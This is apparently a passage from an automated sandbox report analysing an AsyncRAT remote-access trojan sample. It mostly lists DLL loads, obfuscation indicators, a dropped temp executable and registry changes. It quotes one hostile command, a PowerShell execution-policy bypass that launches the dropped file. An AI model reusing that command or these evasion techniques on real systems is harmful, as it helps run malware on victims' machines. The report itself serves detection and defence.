                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: ninput.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: starttiledata.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: usermgrcli.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: usermgrproxy.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: cscui.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: structuredquery.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.globalization.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: bcp47mrm.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: icu.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: mswb7.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.search.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: actxprxy.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: AsyncClient.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: AsyncClient.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    .NET source code contains method to dynamically call methods (often used by packers)
                    Source: 0.2.AsyncClient.exe.3ae89a8.1.raw.unpack, kMtwg0o70HMbUjS709M9.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: 0.2.AsyncClient.exe.69c0000.2.raw.unpack, kMtwg0o70HMbUjS709M9.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Suspicious powershell command line found
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\hklugq.exe"'
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\hklugq.exe"' Jump to behavior
                    Source: hklugq.exe.0.drStatic PE information: 0xE7445B86 [Sat Dec 13 14:26:14 2092 UTC]
                    Source: C:\Users\user\Desktop\AsyncClient.exeCode function: 0_2_06AB83B0 push eax; iretd 0_2_06AB83B1
                    Source: C:\Users\user\Desktop\AsyncClient.exeCode function: 0_2_06AB0B95 push es; ret 0_2_06AB0B9C
                    Source: C:\Users\user\Desktop\AsyncClient.exeCode function: 0_2_06BD1F11 push es; retf 0_2_06BD1F18
                    Source: C:\Users\user\Desktop\AsyncClient.exeCode function: 0_2_06C3C7D7 push es; ret 0_2_06C3C7DC
                    Source: C:\Users\user\Desktop\AsyncClient.exeCode function: 0_2_06C3FCFB push es; ret 0_2_06C3FCFC
                    Source: C:\Users\user\Desktop\AsyncClient.exeCode function: 0_2_06C3FC73 push es; rep ret 0_2_06C3FC7C
                    Source: C:\Users\user\Desktop\AsyncClient.exeCode function: 0_2_06C36543 pushad ; ret 0_2_06C36546
                    Source: C:\Users\user\Desktop\AsyncClient.exeCode function: 0_2_06C3FD43 push ss; rep ret 0_2_06C3FD45
                    Source: C:\Users\user\Desktop\AsyncClient.exeCode function: 0_2_06C3FD07 push es; ret 0_2_06C3FCFC
                    Source: C:\Users\user\Desktop\AsyncClient.exeCode function: 0_2_06C3FD0F push es; ret 0_2_06C3FD10
                    Source: C:\Users\user\Desktop\AsyncClient.exeCode function: 0_2_06C3CA22 push eax; ret 0_2_06C3CA29
                    Source: C:\Users\user\Desktop\AsyncClient.exeCode function: 0_2_06C3FB8B push edx; ret 0_2_06C3FB92
                    Source: C:\Users\user\Desktop\AsyncClient.exeCode function: 0_2_06C3FB93 push edx; ret 0_2_06C3FB92
                    Source: C:\Users\user\Desktop\AsyncClient.exeCode function: 0_2_06C3FB4A push es; ret 0_2_06C3FBA8
                    Source: C:\Users\user\Desktop\AsyncClient.exeCode function: 0_2_06C3C91F push FFFFFFACh; ret 0_2_06C3C922
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeCode function: 5_2_07324E68 push 3C07AEEFh; retf 5_2_07324E75
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeCode function: 5_2_07320288 pushad ; retf 5_2_07320289
                    Source: AsyncClient.exe, RuKzlUtKnKFfltP.csHigh entropy of concatenated method names: 'ROHbgiDdXwwk', 'pISADtCqRbxO', 'QFyJDcXjCWMQfq', 'snRQMDDMpMTm', 'wNZzjFbVOUlkTka', 'qCERfancAfQBOKe', 'kScuSFGCkSP', 'TJpSbHdxZGJB', 'FmkzCujVDPpqrrUK', 'YARhBWFoEkPge'
                    Source: 0.2.AsyncClient.exe.3ae89a8.1.raw.unpack, QisSSXoFjUNPRyebPKUc.csHigh entropy of concatenated method names: 'v87oFT0wtQ4', 'J5roFSvPCjR', 'joGoF4tyrXN', 'JRDoFdABYTM', 'j91oF7v1EOr', 'AYFoF1K6jGX', 'vTboFFZSGZp', 'Wj8oFGqlJpZ', 'TiroFk9Rur2', 'zTEoFMeJJRf'
                    Source: 0.2.AsyncClient.exe.3ae89a8.1.raw.unpack, Connection.csHigh entropy of concatenated method names: 'gTno7tNfvVQ', 'dr53PUohPCPIL68U61S7', 'l1dThaohAGMU1gnt8yNH', 'o1QodeniRPA', 'VQXodjO1FJN', 'k1LodKRNX6J', 'Ldmodwu6Zx7', 'GKuod0CLlVX', 'TFrodHTD5Be', 'UTvodDZfZbd'
                    Source: 0.2.AsyncClient.exe.3ae89a8.1.raw.unpack, kMtwg0o70HMbUjS709M9.csHigh entropy of concatenated method names: 'y2QsfpohB7Zf1Nl7XDHk', 'n6mGHaohJD7ITsIwSaF7', 'N2uo1v2XGV3', 'lnCHhaoBZ3pR9Ag4Ghr2', 'tkUIKToB2UnNqkWKgtAH', 'gg5AoLoBIYEvcUqSxruC', 'm65rVMoBgf1EuEv0SGBT', 'xJrXxtoBXB9dZOKOxuLv', 'mpM5QooBo71SoBKYglw3', 'sD0nIPoBuVdNCUJGy1Oi'
                    Source: 0.2.AsyncClient.exe.3ae89a8.1.raw.unpack, Y4YEPAoF6Ge9CZK1Z7MK.csHigh entropy of concatenated method names: 'ug4oN2aOqti', 'cWioNIYKiTn', 'DXioNgl28Qb', 'CqfoNX4SOGs', 'GwPoNo2a3AI', 'S41oNuQkqdX', 'l8boNYA8Kbu', 'wIloGIRWZO5', 'QJuoNbwxvZU', 'gCKoNW1bqLX'
                    Source: 0.2.AsyncClient.exe.69c0000.2.raw.unpack, QisSSXoFjUNPRyebPKUc.csHigh entropy of concatenated method names: 'v87oFT0wtQ4', 'J5roFSvPCjR', 'joGoF4tyrXN', 'JRDoFdABYTM', 'j91oF7v1EOr', 'AYFoF1K6jGX', 'vTboFFZSGZp', 'Wj8oFGqlJpZ', 'TiroFk9Rur2', 'zTEoFMeJJRf'
                    Source: 0.2.AsyncClient.exe.69c0000.2.raw.unpack, Connection.csHigh entropy of concatenated method names: 'gTno7tNfvVQ', 'dr53PUohPCPIL68U61S7', 'l1dThaohAGMU1gnt8yNH', 'o1QodeniRPA', 'VQXodjO1FJN', 'k1LodKRNX6J', 'Ldmodwu6Zx7', 'GKuod0CLlVX', 'TFrodHTD5Be', 'UTvodDZfZbd'
                    Source: 0.2.AsyncClient.exe.69c0000.2.raw.unpack, kMtwg0o70HMbUjS709M9.csHigh entropy of concatenated method names: 'y2QsfpohB7Zf1Nl7XDHk', 'n6mGHaohJD7ITsIwSaF7', 'N2uo1v2XGV3', 'lnCHhaoBZ3pR9Ag4Ghr2', 'tkUIKToB2UnNqkWKgtAH', 'gg5AoLoBIYEvcUqSxruC', 'm65rVMoBgf1EuEv0SGBT', 'xJrXxtoBXB9dZOKOxuLv', 'mpM5QooBo71SoBKYglw3', 'sD0nIPoBuVdNCUJGy1Oi'
                    Source: 0.2.AsyncClient.exe.69c0000.2.raw.unpack, Y4YEPAoF6Ge9CZK1Z7MK.csHigh entropy of concatenated method names: 'ug4oN2aOqti', 'cWioNIYKiTn', 'DXioNgl28Qb', 'CqfoNX4SOGs', 'GwPoNo2a3AI', 'S41oNuQkqdX', 'l8boNYA8Kbu', 'wIloGIRWZO5', 'QJuoNbwxvZU', 'gCKoNW1bqLX'
                    Source: C:\Users\user\Desktop\AsyncClient.exeFile created: C:\Users\user\AppData\Local\Temp\hklugq.exeJump to dropped file

                    Boot Survival

                    barindex
                    Yara detected AsyncRAT
                    Source: Yara matchFile source: AsyncClient.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.AsyncClient.exe.630000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000000.1429164611.0000000000632000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.3883921677.0000000002951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: AsyncClient.exe PID: 4300, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\AsyncClient.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\20EB796531812A688375 1A717C40FF7F60C18953B46A69A8FC47CCE7DAD6116CD3715DEB2ABF0D80722DJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
